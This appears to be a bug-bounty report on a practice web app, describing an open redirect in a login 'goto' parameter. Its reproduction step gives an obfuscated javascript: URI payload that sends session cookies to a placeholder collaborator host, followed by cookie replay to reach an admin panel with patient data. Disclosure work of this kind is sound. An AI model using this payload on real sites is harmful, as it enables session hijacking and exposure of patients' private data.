Summary

There is a hidden parameter called goto on /login.php that redirects to another location after login. There is an open redirect vulnerability that allows an attacker to creaft a URL to send to the victim so after they login on the genuine First Blood site, they are redirected to the attackers website, and the auth cookies are also passed to the attackers site. The web application fails to filter the javascript URI upon redirecting

Steps to Reproduce

1. Go to the link http://firstbloodhackers.com:{PORT}/login.php?goto=j%09avascript:document.location=%27http://{BURP_COLLAB_URL}/%27%2bdocument.cookie
2. Enter a valid user name and password and click SECURE LOGIN
3. Observe that the user is taken to the attackers website, and the cookies and their values have been leaked to the attacker:

4. Clear all cookies and go to the web app again but do not log in.
5. Add the cookie shows in Step 3 and go to /drpanel/index.php and observe that you are now logged in as admin and view patient data.

Impact

If a victim goes to the web app using this link and logs in, the attacker is able to capture the auth cookies and redirect the user wherever they want. The user may be unaware what has happened, and the attacker can use the cookies to access the doctor management panel as them and view patient PII data.